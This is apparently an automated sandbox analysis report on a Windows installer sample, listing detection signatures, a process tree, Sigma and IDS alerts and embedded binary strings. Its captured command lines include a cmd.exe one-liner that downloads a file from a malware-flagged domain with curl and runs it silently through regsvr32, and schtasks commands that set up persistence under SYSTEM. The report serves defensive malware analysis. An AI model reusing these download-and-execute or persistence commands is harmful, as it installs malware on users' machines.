Windows Analysis Report
1.exe

Overview

General Information

Sample name: 1.exe
Analysis ID: 1624614
MD5: 55db74d76184ca9be1284939b37d41b8
SHA1: b5564229bdbe777deeefd3bdf78ea334b0e09695
SHA256: 58b324d37bbf6d706b0fe5dbb8bca92d9628a9c394ca81121cea1690a16a3afa
Tags: exe, STERLINGSPIRITSCOMPANYLIMITED, user-SquiblydooBlog

Detection

Score: 46
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
.NET source code references suspicious native API functions
Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected AdvancedInstaller

Classification

  • System is w10x64
  • 1.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\1.exe" MD5: 55DB74D76184CA9BE1284939B37D41B8)
    • 1.exe (PID: 928 cmdline: "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="5480" CHAINERUIPROCESSID="5480Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1740568836 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1" MD5: 55DB74D76184CA9BE1284939B37D41B8)
  • msiexec.exe (PID: 3652 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5720 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 1514DFDED1D4D3DC7DCB6F08CA344BC7 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1704 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 2A686A53703CFC1ECF33E3BA90C58CFA MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3168 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B87F19D5FD070A95D977AA5C885A4C95 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MainSoftware.exe (PID: 5696 cmdline: "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent MD5: 7E91C0735D8936E8572276340A6F252E)
      • schtasks.exe (PID: 3912 cmdline: "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 3260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3176 cmdline: "schtasks.exe" /run /tn "MyPersistentApp_Hourly" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SoftwareDistributor.exe (PID: 3064 cmdline: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://p1-ag5.pages.dev?source_id=1 MD5: 2662878C97303F23A828146797CC4827)
      • schtasks.exe (PID: 1272 cmdline: "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MainSoftware.exe (PID: 2252 cmdline: "C:\Program Files (x86)\Main\MainSoftware.exe" Loop MD5: 7E91C0735D8936E8572276340A6F252E)
    • Install.exe (PID: 4556 cmdline: "C:\Program Files (x86)\Main\Chop\Install.exe" MD5: 675F1B648B3E8810A4A32FE32546490B)
      • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2720 cmdline: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 1984 cmdline: curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\289930.ocx" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • regsvr32.exe (PID: 4452 cmdline: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • Install.exe (PID: 4432 cmdline: "C:\Program Files\Surfclub\Install.exe" install https://p1-ag5.pages.dev?source_id=1 MD5: FCC543B0749F3A095487A32338743488)
    • Surfclub.exe (PID: 6284 cmdline: "C:\Program Files\Surfclub\Surfclub.exe" install https://p1-ag5.pages.dev?source_id=1 MD5: 451886E7BDB0BE736A5F2E5A9999CCD0)
  • Surfclub.exe (PID: 6932 cmdline: "C:\Program Files\Surfclub\Surfclub.exe" update MD5: 451886E7BDB0BE736A5F2E5A9999CCD0)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_AdvancedInstaller | Yara detected AdvancedInstaller | Joe Security |

    System Summary

    Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://p1-ag5.pages.dev?source_id=1, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 3064, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f, ProcessId: 1272, ProcessName: schtasks.exe
    Source: Network Connection | Author: frack113 | Data: DestinationIp: 104.21.80.136, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3168, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49740
    Source: Network Connection | Author: Dmitriy Lifanov, oscd.community | Data: DestinationIp: 34.160.111.145, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 4452, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49913
    Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx", CommandLine: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2720, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx", ProcessId: 4452, ProcessName: regsvr32.exe
    Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", CommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Main\Chop\Install.exe" , ParentImage: C:\Program Files (x86)\Main\Chop\Install.exe, ParentProcessId: 4556, ParentProcessName: Install.exe, ProcessCommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", ProcessId: 2720, ProcessName: cmd.exe

    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-02-26T12:23:58.332774+0100 | 2829202 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 104.21.80.136 | 443 | TCP
    2025-02-26T12:24:15.864604+0100 | 2829202 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 104.21.80.136 | 443 | TCP

    AV Detection

    Source: https://wetransfers.io/v.php | Avira URL Cloud: Label: malware
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | ReversingLabs: Detection: 31%
    Source: 1.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: C:\Program Files\Surfclub\Install.exe | Directory created: C:\Program Files\Surfclub\Surfclub.exe
    Source: C:\Program Files\Surfclub\Surfclub.exe | Directory created: C:\Program Files\Surfclub\uuid
    Source: C:\Program Files\Surfclub\Surfclub.exe | Directory created: C:\Program Files\Surfclub\domains
    Source: C:\Program Files\Surfclub\Surfclub.exe | Directory created: C:\Program Files\Surfclub\installation_config.json
    Source: C:\Users\user\Desktop\1.exe | File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\Surfclub\How to uninstall.txt
    Source: C:\Users\user\Desktop\1.exe | File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txt
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txt
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Atomix\How to uninstall.txt
    Source: unknown | HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49740 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49842 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.6.210:443 -> 192.168.2.4:49844 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:49882 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49900 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49920 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49932 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49944 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.59.228:443 -> 192.168.2.4:49952 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49961 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:49963 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49991 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.4:50001 version: TLS 1.2
    Source: 1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D710000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Sockets.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459347730.0000024A2D621000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459431055.0000024A2D661000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Json\Release\net8.0\System.Text.Json.pdb source: MainSoftware.exe, 00000009.00000002.2458563735.0000024A2D4C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458435026.0000024A2D42C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499249216.0000021DED311000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D391000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487209932.0000021DEA141000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458406613.0000024A2D411000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D096000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457231097.0000024A2D161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486216479.0000021DE9F91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D091000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486011190.0000021DE9EC1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Security.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Principal.Windows.ni.pdb source: MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: MainSoftware.exe, 00000009.00000002.2457944763.0000024A2D371000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458017065.0000024A2D381000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ObjectModel.ni.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: MainSoftware.exe, 00000009.00000002.2459714008.0000024A2D6D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459648718.0000024A2D6C2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487984945.0000021DEA262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.Json.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458168635.0000024A2D3CA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458251640.0000024A2D3E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: MainSoftware.exe, 00000009.00000002.2459307961.0000024A2D601000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5DD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Installers Project\Generic\ConsoleApp1\obj\Release\net8.0\win-x64\ConsoleApp1.pdb source: MainSoftware.exe, 00000009.00000002.2453377610.0000020993E41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453268537.0000020993E37000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: MainSoftware.exe, 00000009.00000002.2459749816.0000024A2D6ED000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459831114.0000024A2D701000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Text.Json.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458563735.0000024A2D4C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458435026.0000024A2D42C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499249216.0000021DED311000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Linq.ni.pdb source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D342000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: MainSoftware.exe, 00000009.00000002.2456286438.0000024A2B351000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456196090.0000024A2B349000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459117236.0000024A2D5C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5BC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog/obj/Release/net8.0/Serilog.pdb source: MainSoftware.exe, 00000009.00000002.2453861770.00000209957FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453952929.0000020995831000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482321883.0000021DE7EC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdbUGP source: 1.exe, 00000000.00000003.1702765989.0000000009BF5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886484951.00000000075B7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Collections.ni.pdb source: MainSoftware.exe, 00000009.00000002.2453520509.0000020993E71000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453570792.0000020993EA9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: MainSoftware.exe, 00000009.00000002.2457601992.0000024A2D271000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D247000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2456147251.0000024A2B321000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2FB000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483635124.0000021DE812B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483816012.0000021DE8151000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: MainSoftware.exe, 00000009.00000002.2452853423.0000020993BF1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D22B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D710000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Claims.ni.pdb source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D091000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486011190.0000021DE9EC1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D391000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487209932.0000021DEA141000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Ping.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3DE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455141221.0000024A2A871000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbn source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2F0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: MainSoftware.exe, 00000009.00000002.2472309573.0000024A3051C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472443393.0000024A30531000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: MainSoftware.exe, 00000009.00000002.2455757141.0000024A2B141000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455687451.0000024A2B118000.00000002.00000001.00040000.0000000A.sdmp
